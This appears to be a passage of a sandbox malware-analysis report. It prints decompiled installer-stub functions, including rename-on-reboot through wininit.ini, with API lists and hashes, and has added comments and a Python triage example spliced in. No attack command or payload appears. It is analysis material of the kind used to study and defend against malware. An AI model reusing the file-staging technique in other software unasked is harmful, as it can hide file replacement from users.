                                                                        				if(_t113 < 0) {
                                                                        					_t113 =  *( *0x7a275c - 4 + _t113 * 4);
                                                                        				}
                                                                        				_push( *((intOrPtr*)(_t98 + 0x34)));
                                                                        				_t114 = _t113 +  *0x7a2fb8;
                                                                        				_push(0x22);
                                                                        				_a16 =  *_t114;
                                                                        				_v12 = _v12 & 0x00000000;
                                                                        				_t115 = _t114 + 1;
                                                                        				_v16 = _t115;
                                                                        				_v8 = E00403EBB;
                                                                        				E00403DA7(_a4);
                                                                        				_push( *((intOrPtr*)(_t98 + 0x38)));
                                                                        				_push(0x23);
                                                                        				E00403DA7(_a4);
                                                                        				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                                        				E00403DC9( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                                                                        				_t99 = GetDlgItem(_a4, 0x3e8);
                                                                        				E00403DDC(_t99);
                                                                        				SendMessageA(_t99, 0x45b, 1, 0);
                                                                        				_t86 =  *( *0x7a2f88 + 0x68);
                                                                        				if(_t86 < 0) {
                                                                        					_t86 = GetSysColor( ~_t86);
                                                                        				}
                                                                        				SendMessageA(_t99, 0x443, 0, _t86);
                                                                        				SendMessageA(_t99, 0x445, 0, 0x4010000);
                                                                        				 *0x79e54c =  *0x79e54c & 0x00000000;
                                                                        				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                                                                        				SendMessageA(_t99, 0x449, _a16,  &_v16);
                                                                        				 *0x79f568 =  *0x79f568 & 0x00000000;
                                                                        				return 0;
                                                                        			}

                                                                        APIs
                                                                        • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00403F7A
                                                                        • GetDlgItem.USER32 ref: 00403F8E
                                                                        • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00403FAC
                                                                        • GetSysColor.USER32(?), ref: 00403FBD
                                                                        • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00403FCC
                                                                        • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00403FDB
                                                                        • lstrlenA.KERNEL32(?), ref: 00403FE5
                                                                        • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00403FF3
                                                                        • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404002
                                                                        • GetDlgItem.USER32 ref: 00404065
                                                                        • SendMessageA.USER32(00000000), ref: 00404068
                                                                        • GetDlgItem.USER32 ref: 00404093
                                                                        • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004040D3
                                                                        • LoadCursorA.USER32 ref: 004040E2
                                                                        • SetCursor.USER32(00000000), ref: 004040EB
                                                                        • ShellExecuteA.SHELL32(0000070B,open,007A1F20,00000000,00000000,00000001), ref: 004040FE
                                                                        • LoadCursorA.USER32 ref: 0040410B
                                                                        • SetCursor.USER32(00000000), ref: 0040410E
                                                                        • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040413A
                                                                        • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040414E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                        • String ID: N$open
                                                                        • API String ID: 3615053054-904208323
                                                                        • Opcode ID: f57dfcbcc2afe5e5f36277ccc321ea508118caa9513741def9589acdf25ed01d
                                                                        • Instruction ID: 2049aa6b61ecefec59fc3e575142d3045787f4aa2f6754ef1ed68d4f44ea64a4
                                                                        • Opcode Fuzzy Hash: f57dfcbcc2afe5e5f36277ccc321ea508118caa9513741def9589acdf25ed01d
                                                                        • Instruction Fuzzy Hash: 7C61A171A40309BFEB109F60CC45F6A7B69EB94715F108026FB01BA2D1C7B8E991CF99
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E00405707(long _a4, long _a16) {
                                                                        				CHAR* _v0;
                                                                        				intOrPtr* _t13;
                                                                        				long _t14;
                                                                        				int _t19;
                                                                        				void* _t27;
                                                                        				long _t28;
                                                                        				intOrPtr* _t36;
                                                                        				int _t42;
                                                                        				intOrPtr* _t43;
                                                                        				long _t48;
                                                                        				CHAR* _t50;
                                                                        				void* _t52;
                                                                        				void* _t54;
                                                                        
                                                                        				_t13 = E00405CD2("KERNEL32.dll", "MoveFileExA");
                                                                        				_t50 = _v0;
                                                                        				if(_t13 != 0) {
                                                                        					_t19 =  *_t13(_a4, _t50, 5);
                                                                        					if(_t19 != 0) {
                                                                        						L16:
                                                                        						 *0x7a3010 =  *0x7a3010 + 1;
                                                                        						return _t19;
                                                                        					}
                                                                        				}
                                                                        				 *0x7a1710 = 0x4c554e;
                                                                        				if(_t50 == 0) {
                                                                        					L5:
                                                                        					_t14 = GetShortPathNameA(_a4, 0x7a1188, 0x400);
                                                                        					if(_t14 != 0 && _t14 <= 0x400) {
                                                                        						_t42 = wsprintfA(0x7a0d88, "%s=%s\r\n", 0x7a1710, 0x7a1188);
                                                                        						GetWindowsDirectoryA(0x7a1188, 0x3f0);
                                                                        						lstrcatA(0x7a1188, "\\wininit.ini");
                                                                        						_t19 = CreateFileA(0x7a1188, 0xc0000000, 0, 0, 4, 0x8000080, 0);
                                                                        						_t54 = _t19;
                                                                        						if(_t54 == 0xffffffff) {
                                                                        							goto L16;
                                                                        						}
                                                                        						_t48 = GetFileSize(_t54, 0);
                                                                        						_t5 = _t42 + 0xa; // 0xa
                                                                        						_t52 = GlobalAlloc(0x40, _t48 + _t5);
                                                                        						if(_t52 == 0 || ReadFile(_t54, _t52, _t48,  &_a16, 0) == 0 || _t48 != _a16) {
                                                                        							L15:
                                                                        							_t19 = CloseHandle(_t54);
                                                                        							goto L16;
                                                                        						} else {
                                                                        							if(E00405624(_t52, "[Rename]\r\n") != 0) {
                                                                        								_t27 = E00405624(_t25 + 0xa, "\n[");
                                                                        								if(_t27 == 0) {
                                                                        									L13:
                                                                        									_t28 = _t48;
                                                                        									L14:
                                                                        									E00405670(_t52 + _t28, 0x7a0d88, _t42);
                                                                        									SetFilePointer(_t54, 0, 0, 0);
                                                                        									WriteFile(_t54, _t52, _t48 + _t42,  &_a4, 0);
                                                                        									GlobalFree(_t52);
                                                                        									goto L15;
                                                                        								}
                                                                        								_t36 = _t27 + 1;
                                                                        								_t43 = _t36;
                                                                        								if(_t36 >= _t52 + _t48) {
                                                                        									L21:
                                                                        									_t28 = _t36 - _t52;
                                                                        									goto L14;
                                                                        								} else {
                                                                        									goto L20;
                                                                        								}
                                                                        								// Shift the remainder of the file right by _t42 bytes (the length of the new line) to make room.
                                                                        								// Note: this is a forward copy over an overlapping region (dst = src + _t42). Once _t43 has
                                                                        								// advanced _t42 bytes it reads bytes already overwritten, so any section that follows [Rename]
                                                                        								// ends up as a repeating copy of its first _t42 bytes rather than the original text.
                                                                        								do {
                                                                        									L20:
                                                                        									 *((char*)(_t43 + _t42)) =  *_t43;
                                                                        									_t43 = _t43 + 1;
                                                                        								} while (_t43 < _t52 + _t48);
                                                                        								goto L21;
                                                                        							}
                                                                        							E004059BF(_t52 + _t48, "[Rename]\r\n");
                                                                        							_t48 = _t48 + 0xa;
                                                                        							goto L13;
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					// Rename-on-reboot staged through the [Rename] section of wininit.ini (the legacy Win9x mechanism).
                                                                        					// E00405690 opens/creates the destination path (handle discarded), then its short 8.3 name is fetched
                                                                        					// into 0x7a1710; the entry written later has the form %s=%s (destination=source, see Strings below).
                                                                        					CloseHandle(E00405690(_t50, 0, 1));
                                                                        					_t14 = GetShortPathNameA(_t50, 0x7a1710, 0x400);
                                                                        					if(_t14 != 0 && _t14 <= 0x400) {
                                                                        						goto L5;
                                                                        					}
                                                                        				}
                                                                        				return _t14;
                                                                        			}

                                                                        APIs
                                                                          • Part of subcall function 00405CD2: GetModuleHandleA.KERNEL32(000000F1,0040571A,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CD6
                                                                          • Part of subcall function 00405CD2: LoadLibraryA.KERNEL32(000000F1,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CE4
                                                                          • Part of subcall function 00405CD2: GetProcAddress.KERNEL32(00000000,00000000), ref: 00405CF3
                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 0040575C
                                                                        • GetShortPathNameA.KERNEL32(?,007A1710,00000400), ref: 00405765
                                                                        • GetShortPathNameA.KERNEL32(00000000,007A1188,00000400), ref: 00405782
                                                                        • wsprintfA.USER32 ref: 004057A0
                                                                        • GetWindowsDirectoryA.KERNEL32(007A1188,000003F0,?,?,00000000,000000F1,?), ref: 004057B1
                                                                        • lstrcatA.KERNEL32(007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057BD
                                                                        • CreateFileA.KERNEL32(007A1188,C0000000,00000000,00000000,00000004,08000080,00000000,007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057D4
                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,000000F1,?), ref: 004057E8
                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004057F7
                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040580D
                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,007A0D88,00000000,-0000000A,00409308,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405853
                                                                        • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405865
                                                                        • GlobalFree.KERNEL32 ref: 0040586C
                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405873
                                                                          • Part of subcall function 00405624: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040562B
                                                                          • Part of subcall function 00405624: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040565B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocCreateDirectoryFreeLibraryLoadModulePointerProcReadSizeWindowsWritelstrcatwsprintf
                                                                        • String ID: %s=%s$KERNEL32.dll$MoveFileExA$[Rename]$\wininit.ini
                                                                        • API String ID: 3633819597-1342836890
                                                                        • Opcode ID: 88cf286bee47e5cf7353a5d77c90152df42e9e7f5ff866319d29b32e6d27b106
                                                                        • Instruction ID: e9cd1c615693de8fff4c10b400b586db3ed10c1a7fdb79d3500086280aae1fa0
                                                                        • Opcode Fuzzy Hash: 88cf286bee47e5cf7353a5d77c90152df42e9e7f5ff866319d29b32e6d27b106
                                                                        • Instruction Fuzzy Hash: 8F412132640A057AE32027228C49F6B3A5CDF95745F144636FE06F62D2EA78EC018AAD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%
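The function above stages a file rename for the next boot by editing wininit.ini: it resolves `%WINDIR%\wininit.ini`, locates or appends a `[Rename]` section and inserts a `%s=%s` line (destination=source, both as short 8.3 names). The Python below is an added example, not code from the sample or from the report. It models that file format with a correct insertion that follows the same placement rules as the decompiled branches, a parser that lists the pending renames the way a responder would triage a recovered wininit.ini, and a faithful re-implementation of the decompiled byte-shift loop so the corruption it causes when another section follows `[Rename]` can be seen on real input. Two assumptions not shown on the page: lines end in CRLF (matching the `[Rename]\r\n` header), and a destination of `NUL` means delete (the documented wininit.ini convention, not something this sample is seen to use).

```python
"""Model of the wininit.ini [Rename] rename-on-reboot format (added example)."""

RENAME_HEADER = b"[Rename]\r\n"   # exact header the stub searches for
EOL = b"\r\n"                      # assumed terminator, matches the header's CRLF


def _insert_position(ini: bytes) -> tuple:
    """Return (ini, pos) following the decompiled branch structure.

    No [Rename] section  -> append the header, insert right after it.
    [Rename] then another section -> insert at the '[' of that next section.
    [Rename] is the last section   -> insert at end of file.
    """
    hdr = ini.find(RENAME_HEADER)
    if hdr < 0:
        ini = ini + RENAME_HEADER           # E004059BF(_t52 + _t48, "[Rename]\r\n")
        return ini, len(ini)
    nxt = ini.find(b"\n[", hdr + len(RENAME_HEADER))
    if nxt < 0:
        return ini, len(ini)                # label L13: _t28 = _t48
    return ini, nxt + 1                     # label L21: _t28 = _t36 - _t52


def rename_line(dst: bytes, src: bytes) -> bytes:
    """wsprintfA("%s=%s") plus the terminator: destination=source."""
    return dst + b"=" + src + EOL


def add_rename_entry(ini: bytes, dst: bytes, src: bytes) -> bytes:
    """Correct insertion: slicing never aliases, so the tail of the file survives."""
    ini, pos = _insert_position(ini)
    return ini[:pos] + rename_line(dst, src) + ini[pos:]


def add_rename_entry_as_decompiled(ini: bytes, dst: bytes, src: bytes) -> bytes:
    """Same placement, but the tail is moved with the forward overlapping byte loop
    from the decompiled code (labels L20/L21).  After len(line) iterations the loop
    reads bytes it already overwrote, so a section following [Rename] is replaced by
    a repeating copy of its first len(line) bytes.  Reproduced here only to show the
    effect; it is not a safe way to edit the file."""
    line = rename_line(dst, src)
    ini, pos = _insert_position(ini)
    buf = bytearray(ini) + bytes(len(line))  # GlobalAlloc(GMEM_ZEROINIT, size + n + 10)
    end = len(ini)
    p = pos
    while p < end:                           # do { *(p + n) = *p; p++ } while (p < buf + size)
        buf[p + len(line)] = buf[p]
        p += 1
    buf[pos:pos + len(line)] = line          # E00405670(_t52 + _t28, line, _t42)
    return bytes(buf)


def pending_renames(ini: bytes) -> list:
    """List (action, source, destination) entries in the [Rename] section.

    Entries are read until the next [section] header.  A destination of NUL is
    treated as a delete (assumed wininit.ini convention, see lead-in).
    """
    out = []
    hdr = ini.find(RENAME_HEADER)
    if hdr < 0:
        return out
    for raw in ini[hdr + len(RENAME_HEADER):].split(b"\n"):
        line = raw.rstrip(b"\r")
        if line.startswith(b"["):
            break
        if b"=" not in line:
            continue
        dst, src = line.split(b"=", 1)
        action = "delete" if dst.upper() == b"NUL" else "rename"
        out.append((action, src, dst))
    return out


if __name__ == "__main__":
    # Constructed sample wininit.ini with a section after [Rename].
    sample = b"[Rename]\r\nA=B\r\n[Other]\r\nx=y\r\n"
    print(add_rename_entry(sample, b"C", b"D"))
    print(add_rename_entry_as_decompiled(sample, b"C", b"D"))
    print(pending_renames(add_rename_entry(sample, b"C", b"D")))
```

For triage, `pending_renames` is the part to run over a wininit.ini pulled from an image: each `rename` entry names a file that will be overwritten at the next boot, and every destination is an 8.3 short name that should be resolved back before it is compared against the report's dropped-file list.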

                                                                        C-Code - Quality: 90%
                                                                        			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                                        				struct tagLOGBRUSH _v16;
                                                                        				struct tagRECT _v32;
                                                                        				struct tagPAINTSTRUCT _v96;
                                                                        				struct HDC__* _t70;
                                                                        				struct HBRUSH__* _t87;
                                                                        				struct HFONT__* _t94;
                                                                        				long _t102;
                                                                        				signed int _t126;
                                                                        				struct HDC__* _t128;
                                                                        				intOrPtr _t130;
                                                                        
                                                                        				// _a8 is the window message. 0xf = WM_PAINT: fill the client area with a vertical colour gradient
                                                                        				// (4-pixel bands between the two colours stored at +0x50 and +0x54 of *0x7a2f88), then draw the caption text.
                                                                        				if(_a8 == 0xf) {
                                                                        					_t130 =  *0x7a2f88;
                                                                        					_t70 = BeginPaint(_a4,  &_v96);
                                                                        					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                                        					_a8 = _t70;
                                                                        					GetClientRect(_a4,  &_v32);
                                                                        					_t126 = _v32.bottom;
                                                                        					_v32.bottom = _v32.bottom & 0x00000000;
                                                                        					while(_v32.top < _t126) {
                                                                        						_a12 = _t126 - _v32.top;
                                                                        						asm("cdq");
                                                                        						asm("cdq");
                                                                        						asm("cdq");
                                                                        						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                                        						_t87 = CreateBrushIndirect( &_v16);
                                                                        						_v32.bottom = _v32.bottom + 4;
                                                                        						_a16 = _t87;
                                                                        						FillRect(_a8,  &_v32, _t87);
                                                                        						DeleteObject(_a16);
                                                                        						_v32.top = _v32.top + 4;
                                                                        					}
                                                                        					if( *(_t130 + 0x58) != 0xffffffff) {
                                                                        						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                                                                        						_a16 = _t94;
                                                                        						if(_t94 != 0) {
                                                                        							_t128 = _a8;
                                                                        							_v32.left = 0x10;
                                                                        							_v32.top = 8;
                                                                        							SetBkMode(_t128, 1);
                                                                        							SetTextColor(_t128,  *(_t130 + 0x58));
                                                                        							_a8 = SelectObject(_t128, _a16);
                                                                        							DrawTextA(_t128, 0x7a2780, 0xffffffff,  &_v32, 0x820);
                                                                        							SelectObject(_t128, _a8);
                                                                        							DeleteObject(_a16);
                                                                        						}
                                                                        					}
                                                                        					EndPaint(_a4,  &_v96);
                                                                        					return 0;
                                                                        				}
                                                                        				_t102 = _a16;
                                                                        				// 0x46 = WM_WINDOWPOSCHANGING: _a16 is the WINDOWPOS; set SWP_NOACTIVATE (0x10) in flags (+0x18) and
                                                                        				// force hwndInsertAfter (+4) to the handle stored at 0x7a2f84, so this window never takes focus.
                                                                        				if(_a8 == 0x46) {
                                                                        					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                                        					 *((intOrPtr*)(_t102 + 4)) =  *0x7a2f84;
                                                                        				}
                                                                        				return DefWindowProcA(_a4, _a8, _a12, _t102);
                                                                        			}

                                                                        APIs
                                                                        • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                        • GetClientRect.USER32 ref: 0040105B
                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                        • FillRect.USER32 ref: 004010E4
                                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                                        • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                        • DrawTextA.USER32(00000000,007A2780,000000FF,00000010,00000820), ref: 00401156
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                        • String ID: F
                                                                        • API String ID: 941294808-1304234792
                                                                        • Opcode ID: d7a2dd7084ad759c097eb5b53d13dae876555f77d0d065bcf363b9c8763e90da
                                                                        • Instruction ID: ce6c75dd9c322714a436959803478fdb1fd492375a9fced856522196e90364b0
                                                                        • Opcode Fuzzy Hash: d7a2dd7084ad759c097eb5b53d13dae876555f77d0d065bcf363b9c8763e90da
                                                                        • Instruction Fuzzy Hash: 9E41BA71804249AFCB058FA4CD459BFBFB9FF44314F00812AF951AA1A0C738EA50DFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 88%
                                                                        			E004059E1(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, char _a11) {
                                                                        				struct _ITEMIDLIST* _v8;
                                                                        				char _v12;
                                                                        				signed int _v16;
                                                                        				signed int _v20;
                                                                        				signed int _v24;
                                                                        				signed int _v28;
                                                                        				CHAR* _t35;
                                                                        				signed int _t37;
                                                                        				signed int _t38;
                                                                        				signed int _t49;
                                                                        				char _t51;
                                                                        				signed int _t61;
                                                                        				char* _t62;
                                                                        				char _t67;
                                                                        				signed int _t69;
                                                                        				signed int _t70; /* assigned and used below but omitted from the decompiler's declaration list */
                                                                        				CHAR* _t79;
                                                                        				signed int _t86;
                                                                        				signed int _t88;
                                                                        				void* _t89;
                                                                        
                                                                        				_t61 = _a8;
                                                                        				if(_t61 < 0) {
                                                                        					_t61 =  *( *0x7a275c - 4 + _t61 * 4);
                                                                        				}
                                                                        				_t62 = _t61 +  *0x7a2fb8;
                                                                        				_t35 = 0x7a1f20;
                                                                        				_t79 = 0x7a1f20;
                                                                        				if(_a4 - 0x7a1f20 < 0x800) {
                                                                        					_t79 = _a4;
                                                                        					_a4 = _a4 & 0x00000000;
                                                                        				}
                                                                        				while(1) {
                                                                        					_t67 =  *_t62;
                                                                        					_a11 = _t67;
                                                                        					if(_t67 == 0) {
                                                                        						break;
                                                                        					}
                                                                        					__eflags = _t79 - _t35 - 0x400;
                                                                        					if(_t79 - _t35 >= 0x400) {
                                                                        						break;
                                                                        					}
                                                                        					_t62 = _t62 + 1;
                                                                        					__eflags = _t67 - 0xfc;
                                                                        					if(__eflags <= 0) {
                                                                        						if(__eflags != 0) {
                                                                        							 *_t79 = _t67;
                                                                        							_t79 =  &(_t79[1]);
                                                                        							__eflags = _t79;
                                                                        						} else {
                                                                        							 *_t79 =  *_t62;
                                                                        							_t79 =  &(_t79[1]);
                                                                        							_t62 = _t62 + 1;
                                                                        						}
                                                                        						continue;
                                                                        					}
                                                                        					_t37 =  *((char*)(_t62 + 1));
                                                                        					_t69 =  *_t62;
                                                                        					_t86 = (_t37 & 0x0000007f) << 0x00000007 | _t69 & 0x0000007f;
                                                                        					_v28 = _t69;
                                                                        					_v20 = _t37;
                                                                        					_t70 = _t69 | 0x00008000;
                                                                        					_t38 = _t37 | 0x00008000;
                                                                        					_v24 = _t69 | 0x00008000;
                                                                        					_t62 = _t62 + 2;
                                                                        					__eflags = _a11 - 0xfe;
                                                                        					_v16 = _t38;
                                                                        					if(_a11 != 0xfe) {
                                                                        						__eflags = _a11 - 0xfd;
                                                                        						if(_a11 != 0xfd) {
                                                                        							__eflags = _a11 - 0xff;
                                                                        							if(_a11 == 0xff) {
                                                                        								__eflags = (_t38 | 0xffffffff) - _t86;
                                                                        								E004059E1(_t62, _t79, _t86, _t79, (_t38 | 0xffffffff) - _t86);
                                                                        							}
                                                                        							L38:
                                                                        							_t79 =  &(_t79[lstrlenA(_t79)]);
                                                                        							_t35 = 0x7a1f20;
                                                                        							continue;
                                                                        						}
                                                                        						__eflags = _t86 - 0x1b;
                                                                        						if(_t86 != 0x1b) {
                                                                        							__eflags = (_t86 << 0xa) + 0x7a4000;
                                                                        							E004059BF(_t79, (_t86 << 0xa) + 0x7a4000);
                                                                        						} else {
                                                                        							E0040591D(_t79,  *0x7a2f84);
                                                                        						}
                                                                        						__eflags = _t86 + 0xffffffeb - 6;
                                                                        						if(_t86 + 0xffffffeb < 6) {
                                                                        							L29:
                                                                        							E00405BFB(_t79);
                                                                        						}
                                                                        						goto L38;
                                                                        					}
                                                                        					_a8 = _a8 & 0x00000000;
                                                                        					 *_t79 =  *_t79 & 0x00000000;
                                                                        					_t88 = 4;
                                                                        					__eflags = _v20 - _t88;
                                                                        					if(_v20 != _t88) {
                                                                        						_t49 = _v28;
                                                                        						__eflags = _t49 - 0x2b;
                                                                        						if(_t49 != 0x2b) {
                                                                        							__eflags = _t49 - 0x26;
                                                                        							if(_t49 != 0x26) {
                                                                        								__eflags = _t49 - 0x25;
                                                                        								if(_t49 != 0x25) {
                                                                        									__eflags = _t49 - 0x24;
                                                                        									if(_t49 != 0x24) {
                                                                        										goto L19;
                                                                        									}
                                                                        									GetWindowsDirectoryA(_t79, 0x400);
                                                                        									goto L18;
                                                                        								}
                                                                        								GetSystemDirectoryA(_t79, 0x400);
                                                                        								goto L18;
                                                                        							}
                                                                        							E004058B3(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", "ProgramFilesDir", _t79);
                                                                        							__eflags =  *_t79;
                                                                        							if( *_t79 != 0) {
                                                                        								goto L29;
                                                                        							}
                                                                        							E004059BF(_t79, "C:\\Program Files");
                                                                        							goto L18;
                                                                        						} else {
                                                                        							E004058B3(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", "CommonFilesDir", _t79);
                                                                        							L18:
                                                                        							__eflags =  *_t79;
                                                                        							if( *_t79 != 0) {
                                                                        								goto L29;
                                                                        							}
                                                                        							goto L19;
                                                                        						}
                                                                        					} else {
                                                                        						_a8 = "\\Microsoft\\Internet Explorer\\Quick Launch";
                                                                        						L19:
                                                                        						__eflags =  *0x7a3004;
                                                                        						if( *0x7a3004 == 0) {
                                                                        							_t88 = 2;
                                                                        						}
                                                                        						do {
                                                                        							_t88 = _t88 - 1;
                                                                        							_t51 = SHGetSpecialFolderLocation( *0x7a2f84,  *(_t89 + _t88 * 4 - 0x18),  &_v8);
                                                                        							__eflags = _t51;
                                                                        							if(_t51 != 0) {
                                                                        								 *_t79 =  *_t79 & 0x00000000;
                                                                        								__eflags =  *_t79;
                                                                        								goto L25;
                                                                        							}
                                                                        							__imp__SHGetPathFromIDListA(_v8, _t79);
                                                                        							_v12 = _t51;
                                                                        							E0040521C(_t70, _v8);
                                                                        							__eflags = _v12;
                                                                        							if(_v12 != 0) {
                                                                        								break;
                                                                        							}
                                                                        							L25:
                                                                        							__eflags = _t88;
                                                                        						} while (_t88 != 0);
                                                                        						__eflags =  *_t79;
                                                                        						if( *_t79 != 0) {
                                                                        							__eflags = _a8;
                                                                        							if(_a8 != 0) {
                                                                        								lstrcatA(_t79, _a8);
                                                                        							}
                                                                        						}
                                                                        						goto L29;
                                                                        					}
                                                                        				}
                                                                        				 *_t79 =  *_t79 & 0x00000000;
                                                                        				if(_a4 == 0) {
                                                                        					return _t35;
                                                                        				}
                                                                        				return E004059BF(_a4, _t35);
                                                                        			}

                                                                        APIs
                                                                        • SHGetSpecialFolderLocation.SHELL32(00404D9A,00789938,00000006,0079ED60,00000000,00404D9A,0079ED60,00000000), ref: 00405B29
                                                                        • SHGetPathFromIDListA.SHELL32(00789938,007A1F20), ref: 00405B37
                                                                        • lstrcatA.KERNEL32(007A1F20,00000000), ref: 00405B66
                                                                        • lstrlenA.KERNEL32(007A1F20,00000006,0079ED60,00000000,00404D9A,0079ED60,00000000,00000000,0078ED38,00789938), ref: 00405BBA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp
